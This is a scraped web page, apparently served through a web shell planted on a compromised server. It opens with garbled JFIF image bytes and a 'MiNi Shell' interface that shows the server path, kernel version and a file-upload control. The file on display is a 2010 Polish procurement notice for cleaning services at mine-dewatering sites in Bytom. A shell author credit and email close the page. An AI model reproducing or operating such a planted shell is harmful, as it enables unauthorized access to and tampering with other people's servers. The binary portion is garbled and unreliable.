JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100813/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100813/219553-N-2010.html

<p class="kh_header"><b>Bytom: Kompleksową usługę w zakresie utrzymania czystości i porządku na terenie
i w obiektach Zakładu Centralny Zakład Odwadniania Kopalń na 2011r. 
w tym:

Część I  rejony:     Saturn, Siemianowice, Jan Kanty                                                         
   Część  II  rejony    Pstrowski, Szombierki, Powstańców Śląskich-Bytom I        
   Część  III  rejon    Dębieńsko</b><br>
<b>Numer ogłoszenia: 219553 - 2010; data zamieszczenia: 13.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Spółka Restrukturyzacji Kopalń S.A. , ul. Strzelców Bytomskich 207, 41-914 Bytom, woj. śląskie, tel. 032 3513300, 3513301, 3513364, faks 032 3513309, -10, 3513369.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.srk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednoosobowa Spółka Skarbu Państwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksową usługę w zakresie utrzymania czystości i porządku na terenie
i w obiektach Zakładu Centralny Zakład Odwadniania Kopalń na 2011r. 
w tym:

Część I  rejony:     Saturn, Siemianowice, Jan Kanty                                                         
   Część  II  rejony    Pstrowski, Szombierki, Powstańców Śląskich-Bytom I        
   Część  III  rejon    Dębieńsko.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 

 Kompleksowa usługa w zakresie utrzymania czystości i porządku na terenie i w obiektach    
 Zakładu Centralny Zakład Odwadniania Kopalń na 2011r. w tym:

Część I  rejony:     Saturn, Siemianowice, Jan Kanty                                                         
   Część  II  rejony    Pstrowski, Szombierki, Powstańców Śląskich-Bytom I        
   Część  III  rejon    Dębieńsko.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 99.91.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta obejmująca całość przedmiotu przetargu powinna być zabezpieczona wadium 
            w wysokości: 16 200,00 zł ( słownie: szesnaście tysięcy dwieście złotych 00/100) w tym: 
w przypadku złożenia oferty na Część I wadium wynosi: 8 900,00 zł (osiem tysięcy dziewięćset złotych 00/100)
w przypadku złożenia oferty na Część II wadium wynosi: 4 500,00 zł (cztery tysiące  pięćset złotych 00/100)
w przypadku złożenia oferty na Część III wadium wynosi: 2 800,00 zł (dwa tysiące osiemset złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien specjalizować się na rynku w wykonywaniu usług o charakterze 
i złożoności porównywalnej z zakresem zamówienia oraz udokumentować realizację 
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej usługi odpowiadającej swoim rodzajem, złożonością i wartością usługom stanowiącym przedmiot zamówienia o wartości minimum - dla Części I - 179 000,00 zł brutto, dla Części II - 
91 000,00 zł brutto, dla Części III - 58 000,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jeżeli Wykonawca polega na zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków obowiązany jest przedłożyć informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których te podmioty posiadają rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową tych podmiotów, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.    Oświadczenia Wykonawcy w trybie art. 44 ustawy Pzp w związku z art. 22 ust.1
ustawy Pzp zgodnie z pkt. 5.1. SIWZ - załączniki nr 2, 2a, 2b, 2c, 2d do druku OFERTA.          
Wykonawca powołujący się przy wykazaniu spełniania warunków udziału                            w postępowaniu w zakresie wiedzy i doświadczenia, potencjału technicznego, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów (załączniki nr 2a, 2b, 2c, 2d), zobowiązany jest uzyskać pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania 
z nich przy wykonaniu zamówienia, które należy dołączyć do załączników nr 2a, 2b, 2c, 2d do druku OFERTA.
           W przypadku oferty składanej przez wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, oświadczenie o spełnianiu warunków, o których mowa w art. 22 ust. 1- 4 ustawy Pzp (pkt. 5.1.1. do 5.1.4 SIWZ) składa przynajmniej jeden 
z Wykonawców lub wszyscy ci Wykonawcy wspólnie.
2. W przypadku udziału podwykonawcy, Wykonawca zobowiązany jest do złożenia oświadczenia o wykonaniu części zamówienia przez  podwykonawcę.- załącznik nr 4 do druku OFERTA
Przedłożone dokumenty, o których mowa powyżej muszą potwierdzać spełnianie przez Wykonawcę warunku udziału w postępowaniu nie później jednak niż w dniu, w którym upłynął termin składania ofert.
3. Projekt umowy - załącznik nr 6 do druku OFERTA.
4.    Wypełniony formularz cenowy - załącznik nr 7.1-7.2 do druku OFERTA  wraz 
z załączoną szczegółową kalkulacją usługi w formie kosztorysu cenotwórczego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający informuje, że niedopuszczalna jest zmiana postanowień niniejszej umowy 
w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że konieczność takiej zmiany wynika z okoliczności, których nie można było przewidzieć 
w chwili zawarcia umowy, a które powodują obiektywną i uzasadnioną konieczność zmiany treści zawartej umowy, w tym także w przypadku ustawowej zmiany obowiązującej stawki podatku od towarów i usług.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.srk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Spółka Restrukturyzacji Kopalń S.A. 41-914 Bytom, ul. Strzelców Bytomskich 207 p. 112..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.09.2010 godzina 09:00, miejsce: Spółka Restrukturyzacji Kopalń S.A. 41-914 Bytom, ul. Strzelców Bytomskich 207 - II piętro Sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kompleksową usługę w zakresie utrzymania czystości i porządku na terenie
i w obiektach Zakładu Centralny Zakład Odwadniania Kopalń na 2011r. 
w tym:

   Część I  rejony:     Saturn, Siemianowice, Jan Kanty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres rzeczowy zamówienia obejmuje: 

 - utrzymanie czystości w pomieszczeniach biurowych, socjalnych obiektów zakładu.
       - utrzymanie czystości, konserwacji i obsługi łaźni pracowniczych i dozoru ruchu.
          - naprawę oraz pranie odzieży roboczej,
          - sprzątanie terenów przyległych do obiektów zakładu, wykaszanie traw, odgarnianie śniegu,
          - usuwanie drobnych awarii-usterek instalacji wodno-kanalizacyjnej, stolarki drzwiowej 
       i okiennej
         - wywóz nieczystości stałych,
         - zabezpieczenie - dostawa worków na śmieci  i środków higienicznych do utrzymania   
     czystości, na poszczególnych rejonach,
         - wykonanie dezynfekcji, dezynsekcji i dezatyracji pomieszczeń w razie konieczności.   
2. Zapewnienie środków higienicznych niezbędnych do utrzymania czystości wg 
              zapotrzebowania miesięcznego. Ilość środków higienicznych w poszczególnych    
              miesiącach może ulec zmianie w zależności od potrzeb Zamawiającego, nie więcej niż:

              a) rejon Saturn:
 -
Papier toaletowy -duży (rola średnicy 19 cm)  
szt.
  19
 -
Papier toaletowy -dwuwarstwowy mały
(szer10cm x gr.12cm 
        szt.

130
 -
Ręczniki papierowe składane - karton 5000 listków  
        szt.

   7
 -
Mydło w płynie pojemnik 5 litrów
szt.
   5
 -
Nabój zapachowy do odświeżacza elektrycznego
szt.
   2

              b) rejon Siemianowice:
 -
Papier toaletowy -dwuwarstwowy mały
(szer10cm x gr.12cm )
 szt.
  42
 -
Ręczniki -  rola papierowa   
 szt.
  30
 -
Mydło w płynie pojemnik 5 litrów
 szt.
    1

              c) rejon Jan Kanty:
 -
Papier toaletowy -dwuwarstwowy mały
(szer10cm x gr.12cm) 
szt.
   42
 -
Ręczniki -  rola papierowa   
szt.
   30
 -
Mydło w płynie pojemnik 5 litrów
szt.
     2

3.2.3. Zapewnienie worków na śmieci foliowych wg zapotrzebowania miesięcznego. Ilość 
          worków na śmieci w poszczególnych miesiącach może ulec zmianie w zależności od potrzeb    
          Zamawiającego, nie więcej niż:
         
           a) rejon Saturn:
-
Worki na śmieci plastikowe o pojemności 35L  
50szt.op.             
16
-
Worki na śmieci plastikowe o pojemności 60L  
50szt.op.        
  2
-
Worki na śmieci plastikowe o pojemności 120L 
50szt.op.       
  2

          b) rejon Siemianowice

-
Worki na śmieci plastikowe o pojemności 35L  
50szt.op.               
   4
-
Worki na śmieci plastikowe o pojemności 60L  
50sztop.
   1
-
Worki na śmieci plastikowe o pojemności 120L 
50szt.op.
   1

         c) rejon Jan Kanty
-
Worki na śmieci plastikowe o pojemności 35L  
50szt.op.               
   4
-
Worki na śmieci plastikowe o pojemności 60L  
50szt.op.
   1
-
Worki na śmieci plastikowe o pojemności 120L 
50szt.op.
   1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kompleksowa usługa w zakresie utrzymania czystości i porządku na terenie i w obiektach Zakładu Centralny Zakład Odwadniania Kopalń na 2011r. w  tym:
Część  II    rejony    Pstrowski, Szombierki, Powstańców Śląskich-Bytom I.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres rzeczowy zamówienia obejmuje: 
- utrzymanie czystości w pomieszczeniach biurowych, socjalnych obiektów zakładu.
      - utrzymanie czystości, konserwacji i obsługi łaźni pracowniczych i dozoru ruchu.
         - naprawę oraz pranie odzieży roboczej,
         - sprzątanie terenów przyległych do obiektów zakładu, wykaszanie traw, odgarnianie śniegu,
         - usuwanie drobnych awarii-usterek instalacji wodno-kanalizacyjnej, stolarki drzwiowej 
       i okiennej
         - wywóz nieczystości stałych,
         - zabezpieczenie - dostawa worków na śmieci  i środków higienicznych do utrzymania   
     czystości, na poszczególnych rejonach,
         - wykonanie dezynfekcji, dezynsekcji i dezatyracji pomieszczeń w razie konieczności.   
2. Zapewnienie środków higienicznych niezbędnych do utrzymania czystości wg 
             zapotrzebowania miesięcznego. Ilość środków higienicznych w poszczególnych    
             miesiącach może ulec zmianie w zależności od potrzeb Zamawiającego, nie więcej niż:

              a) rejon Pstrowski:
 -
Papier toaletowy -dwuwarstwowy mały
(szer10cm x gr.12cm 
szt.
62
 -
Ręczniki - rola papierowa
szt.
45
 -
Mydło w płynie pojemnik 5 litrów
szt.
  2

              b) rejon Powstańców Śląskich - Bytom I:
 -
Papier toaletowy -dwuwarstwowy mały
(szer10cm x gr.12cm )
 szt.
52
 -
Ręczniki -  rola papierowa   
 szt.
30
 -
Mydło w płynie pojemnik 5 litrów
 szt.
  2

3.3.3. Zapewnienie worków na śmieci foliowych wg zapotrzebowania miesięcznego. Ilość 
          worków na śmieci w poszczególnych miesiącach może ulec zmianie w zależności od potrzeb    
          Zamawiającego, nie więcej niż:
         
           a) rejon Pstrowski:
-
Worki na śmieci plastikowe o pojemności 35L  
50szt./op.             
5
-
Worki na śmieci plastikowe o pojemności 60L  
50szt./op.        
3
-
Worki na śmieci plastikowe o pojemności 120L 
50szt./op.       
3

          b) rejon Powstańców Śląskich - Bytom I
-
Worki na śmieci plastikowe o pojemności 35L  
50szt./op.               
3
-
Worki na śmieci plastikowe o pojemności 60L  
50szt/op.       
2
-
Worki na śmieci plastikowe o pojemności 120L 
50szt./op.       
1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kompleksowa usługa w zakresie utrzymania czystości i porządku na terenie i w obiektach Zakładu Centralny Zakład Odwadniania Kopalń na 2011r. w  tym:
 Część  III  rejon    Dębieńsko.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres rzeczowy zamówienia obejmuje: 
- utrzymanie czystości w pomieszczeniach biurowych, socjalnych obiektów zakładu.
      - utrzymanie czystości, konserwacji i obsługi łaźni pracowniczych i dozoru ruchu.
         - naprawę oraz pranie odzieży roboczej,
         - sprzątanie terenów przyległych do obiektów zakładu, wykaszanie traw, odgarnianie śniegu,
         - usuwanie drobnych awarii-usterek instalacji wodno-kanalizacyjnej, stolarki drzwiowej 
       i okiennej
         - wywóz nieczystości stałych,
         - zabezpieczenie - dostawa worków na śmieci  i środków higienicznych do utrzymania   
     czystości, na poszczególnych rejonach,
         - wykonanie dezynfekcji, dezynsekcji i dezatyracji pomieszczeń w razie konieczności
2. Zapewnienie środków higienicznych niezbędnych do utrzymania czystości wg 
              zapotrzebowania miesięcznego. Ilość środków higienicznych w poszczególnych    
              miesiącach może ulec zmianie w zależności od potrzeb Zamawiającego, nie więcej niż:
              a) rejon Dębieńsko:
 -
Papier toaletowy -dwuwarstwowy mały
(szer10cm x gr.12cm 
szt.
71
 -
Ręczniki - rola papierowa
szt.
60
 -
Mydło w płynie pojemnik 5 litrów
szt.
 2

3.4.3. Zapewnienie worków na śmieci foliowych wg zapotrzebowania miesięcznego. Ilość 
          worków na śmieci w poszczególnych miesiącach może ulec zmianie w zależności od potrzeb    
          Zamawiającego, nie więcej niż:
         
           a) rejon Dębieńsko:
-
Worki na śmieci plastikowe o pojemności 35L  
50szt./op.             
3
-
Worki na śmieci plastikowe o pojemności 60L  
50szt./op.        
2
-
Worki na śmieci plastikowe o pojemności 120L 
50szt./op.       
2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com